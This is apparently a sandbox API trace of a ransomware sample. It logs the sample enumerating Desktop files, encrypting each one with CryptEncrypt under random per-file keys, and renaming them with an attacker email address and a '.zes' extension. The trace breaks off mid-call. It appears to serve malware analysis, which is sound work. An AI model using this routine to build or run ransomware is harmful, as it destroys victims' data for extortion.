SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.218] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x11aed, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x11aed, lpOverlapped=0x0) returned 1 [0134.219] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x11af0, dwBufLen=0x11af0 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x11af0) returned 1 [0134.220] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.220] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x11af0, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x11af0, lpOverlapped=0x0) returned 1 [0134.220] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.220] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x11bc4, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.220] SetEndOfFile (hFile=0x124) returned 1 [0134.222] GetProcessHeap () returned 0x520000 [0134.223] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.223] GetProcessHeap () returned 0x520000 [0134.223] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.223] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NZt4WTx8.ots" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nzt4wtx8.ots"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\NZt4WTx8.ots.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\nzt4wtx8.ots.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.227] CloseHandle (hObject=0x124) returned 1 [0134.227] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.227] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x47c93b50, ftCreationTime.dwHighDateTime=0x1d5db29, ftLastAccessTime.dwLowDateTime=0xfbb17060, ftLastAccessTime.dwHighDateTime=0x1d5dfa7, ftLastWriteTime.dwLowDateTime=0xfbb17060, ftLastWriteTime.dwHighDateTime=0x1d5dfa7, nFileSizeHigh=0x0, nFileSizeLow=0x18f5f, dwReserved0=0x0, dwReserved1=0xffff, cFileName="o4Mezc2IK4f8C_fMJ.rtf", cAlternateFileName="O4MEZC~1.RTF")) returned 1 [0134.227] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Mezc2IK4f8C_fMJ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4mezc2ik4f8c_fmj.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.227] GetProcessHeap () returned 0x520000 [0134.227] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.227] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.227] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.228] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x1, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x1, lpOverlapped=0x0) returned 1 [0134.229] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.229] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.229] GetProcessHeap () returned 0x520000 [0134.229] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.229] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.229] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.229] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.229] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.229] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.229] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.229] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.230] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.230] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.230] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.230] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.230] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x18f5f, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x18f5f, lpOverlapped=0x0) returned 1 [0134.231] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x18f60, dwBufLen=0x18f60 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x18f60) returned 1 [0134.232] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.232] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x18f60, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x18f60, lpOverlapped=0x0) returned 1 [0134.233] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.233] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x19044, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.233] SetEndOfFile (hFile=0x124) returned 1 [0134.237] GetProcessHeap () returned 0x520000 [0134.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544aa0 | out: hHeap=0x520000) returned 1 [0134.237] GetProcessHeap () returned 0x520000 [0134.237] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.237] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Mezc2IK4f8C_fMJ.rtf" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4mezc2ik4f8c_fmj.rtf"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\o4Mezc2IK4f8C_fMJ.rtf.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\o4mezc2ik4f8c_fmj.rtf.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.241] CloseHandle (hObject=0x124) returned 1 [0134.241] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.241] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x475420c0, ftCreationTime.dwHighDateTime=0x1d5e5fd, ftLastAccessTime.dwLowDateTime=0xbec567f0, ftLastAccessTime.dwHighDateTime=0x1d5e3bd, ftLastWriteTime.dwLowDateTime=0xbec567f0, ftLastWriteTime.dwHighDateTime=0x1d5e3bd, nFileSizeHigh=0x0, nFileSizeLow=0x7974, dwReserved0=0x0, dwReserved1=0xffff, cFileName="p6WJ6Sf_Bnqv.bmp", cAlternateFileName="P6WJ6S~1.BMP")) returned 1 [0134.241] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6WJ6Sf_Bnqv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6wj6sf_bnqv.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.242] GetProcessHeap () returned 0x520000 [0134.242] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.242] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.242] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.242] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xc, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xc, lpOverlapped=0x0) returned 1 [0134.243] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.243] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.243] GetProcessHeap () returned 0x520000 [0134.243] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.243] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.243] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.243] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.243] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.243] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.244] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.244] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.244] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.244] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.244] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.244] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.244] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x7974, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x7974, lpOverlapped=0x0) returned 1 [0134.245] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x7980, dwBufLen=0x7980 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x7980) returned 1 [0134.245] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.245] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x7980, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x7980, lpOverlapped=0x0) returned 1 [0134.247] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.247] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x7a54, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.247] SetEndOfFile (hFile=0x124) returned 1 [0134.251] GetProcessHeap () returned 0x520000 [0134.251] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.251] GetProcessHeap () returned 0x520000 [0134.251] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.251] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6WJ6Sf_Bnqv.bmp" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6wj6sf_bnqv.bmp"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\p6WJ6Sf_Bnqv.bmp.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\p6wj6sf_bnqv.bmp.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.254] CloseHandle (hObject=0x124) returned 1 [0134.255] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.255] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xfcd92ca0, ftCreationTime.dwHighDateTime=0x1d5dde8, ftLastAccessTime.dwLowDateTime=0x14a0b710, ftLastAccessTime.dwHighDateTime=0x1d5dd65, ftLastWriteTime.dwLowDateTime=0x14a0b710, ftLastWriteTime.dwHighDateTime=0x1d5dd65, nFileSizeHigh=0x0, nFileSizeLow=0x16d3a, dwReserved0=0x0, dwReserved1=0xffff, cFileName="rcM75 cm.mkv", cAlternateFileName="RCM75C~1.MKV")) returned 1 [0134.255] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rcM75 cm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rcm75 cm.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.255] GetProcessHeap () returned 0x520000 [0134.255] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.255] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.255] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.255] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0x6, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0x6, lpOverlapped=0x0) returned 1 [0134.256] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.256] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.256] GetProcessHeap () returned 0x520000 [0134.256] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x40) returned 0x535588 [0134.256] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40, dwBufLen=0x40 | out: pbData=0x535588*, pdwDataLen=0x23ffc78*=0x40) returned 1 [0134.257] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.257] WriteFile (in: hFile=0x124, lpBuffer=0x535588*, nNumberOfBytesToWrite=0x40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x535588*, lpNumberOfBytesWritten=0x23ffc90*=0x40, lpOverlapped=0x0) returned 1 [0134.257] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.257] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.257] WriteFile (in: hFile=0x124, lpBuffer=0x544990*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544990*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.257] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.257] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.257] CryptImportKey (in: hProv=0x534c10, pbData=0x544890, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.257] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.257] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.257] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0x16d3a, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0x16d3a, lpOverlapped=0x0) returned 1 [0134.258] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x16d40, dwBufLen=0x16d40 | out: pbData=0x2140020*, pdwDataLen=0x23ffc78*=0x16d40) returned 1 [0134.259] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.259] WriteFile (in: hFile=0x124, lpBuffer=0x2140020*, nNumberOfBytesToWrite=0x16d40, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesWritten=0x23ffc90*=0x16d40, lpOverlapped=0x0) returned 1 [0134.260] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.260] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x16e14, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.260] SetEndOfFile (hFile=0x124) returned 1 [0134.264] GetProcessHeap () returned 0x520000 [0134.264] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x535588 | out: hHeap=0x520000) returned 1 [0134.264] GetProcessHeap () returned 0x520000 [0134.264] HeapFree (in: hHeap=0x520000, dwFlags=0x0, lpMem=0x544b60 | out: hHeap=0x520000) returned 1 [0134.264] MoveFileW (lpExistingFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rcM75 cm.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rcm75 cm.mkv"), lpNewFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rcM75 cm.mkv.[4B2E4630].[johncastle@msgsafe.io].zes" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rcm75 cm.mkv.[4b2e4630].[johncastle@msgsafe.io].zes")) returned 1 [0134.268] CloseHandle (hObject=0x124) returned 1 [0134.269] WaitForSingleObject (hHandle=0x118, dwMilliseconds=0x0) returned 0x102 [0134.269] FindNextFileW (in: hFindFile=0x544b08, lpFindFileData=0x23ffd20 | out: lpFindFileData=0x23ffd20*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x1924cd80, ftCreationTime.dwHighDateTime=0x1d5d860, ftLastAccessTime.dwLowDateTime=0xc779eae0, ftLastAccessTime.dwHighDateTime=0x1d5e027, ftLastWriteTime.dwLowDateTime=0xc779eae0, ftLastWriteTime.dwHighDateTime=0x1d5e027, nFileSizeHigh=0x0, nFileSizeLow=0xe2f1, dwReserved0=0x0, dwReserved1=0xffff, cFileName="rFizuWFKJxS8V2i7l3.mkv", cAlternateFileName="RFIZUW~1.MKV")) returned 1 [0134.269] CreateFileW (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\rFizuWFKJxS8V2i7l3.mkv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\rfizuwfkjxs8v2i7l3.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x4, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x124 [0134.269] GetProcessHeap () returned 0x520000 [0134.269] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x10) returned 0x544b60 [0134.269] CryptGenRandom (in: hProv=0x534c10, dwLen=0x10, pbBuffer=0x544b60 | out: pbBuffer=0x544b60) returned 1 [0134.269] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb0 | out: lpNewFilePointer=0x0) returned 1 [0134.270] WriteFile (in: hFile=0x124, lpBuffer=0x23ffcc0*, nNumberOfBytesToWrite=0xf, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffcc0*, lpNumberOfBytesWritten=0x23ffc90*=0xf, lpOverlapped=0x0) returned 1 [0134.271] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.271] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.271] GetProcessHeap () returned 0x520000 [0134.271] RtlAllocateHeap (HeapHandle=0x520000, Flags=0x0, Size=0x50) returned 0x544aa0 [0134.271] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50, dwBufLen=0x50 | out: pbData=0x544aa0*, pdwDataLen=0x23ffc78*=0x50) returned 1 [0134.271] CryptDestroyKey (hKey=0x53a568) returned 1 [0134.271] WriteFile (in: hFile=0x124, lpBuffer=0x544aa0*, nNumberOfBytesToWrite=0x50, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544aa0*, lpNumberOfBytesWritten=0x23ffc90*=0x50, lpOverlapped=0x0) returned 1 [0134.271] WriteFile (in: hFile=0x124, lpBuffer=0x23ffc98*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffc98*, lpNumberOfBytesWritten=0x23ffc90*=0x4, lpOverlapped=0x0) returned 1 [0134.271] WriteFile (in: hFile=0x124, lpBuffer=0x544b60*, nNumberOfBytesToWrite=0x10, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544b60*, lpNumberOfBytesWritten=0x23ffc90*=0x10, lpOverlapped=0x0) returned 1 [0134.271] WriteFile (in: hFile=0x124, lpBuffer=0x544a18*, nNumberOfBytesToWrite=0x80, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x544a18*, lpNumberOfBytesWritten=0x23ffc90*=0x80, lpOverlapped=0x0) returned 1 [0134.272] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x23ffcb8 | out: lpNewFilePointer=0x0) returned 1 [0134.272] WriteFile (in: hFile=0x124, lpBuffer=0x23ffca8*, nNumberOfBytesToWrite=0x8, lpNumberOfBytesWritten=0x23ffc90, lpOverlapped=0x0 | out: lpBuffer=0x23ffca8*, lpNumberOfBytesWritten=0x23ffc90*=0x8, lpOverlapped=0x0) returned 1 [0134.272] CryptImportKey (in: hProv=0x534c10, pbData=0x544958, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x0, phKey=0x23ffc94 | out: phKey=0x23ffc94*=0x53a568) returned 1 [0134.272] CryptSetKeyParam (hKey=0x53a568, dwParam=0x1, pbData=0x544b60, dwFlags=0x0) returned 1 [0134.272] SetFilePointerEx (in: hFile=0x124, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0134.272] ReadFile (in: hFile=0x124, lpBuffer=0x2140020, nNumberOfBytesToRead=0xe2f1, lpNumberOfBytesRead=0x23ffc9c, lpOverlapped=0x0 | out: lpBuffer=0x2140020*, lpNumberOfBytesRead=0x23ffc9c*=0xe2f1, lpOverlapped=0x0) returned 1 [0134.273] CryptEncrypt (in: hKey=0x53a568, hHash=0x0, Final=0, dwFlags=0x0, 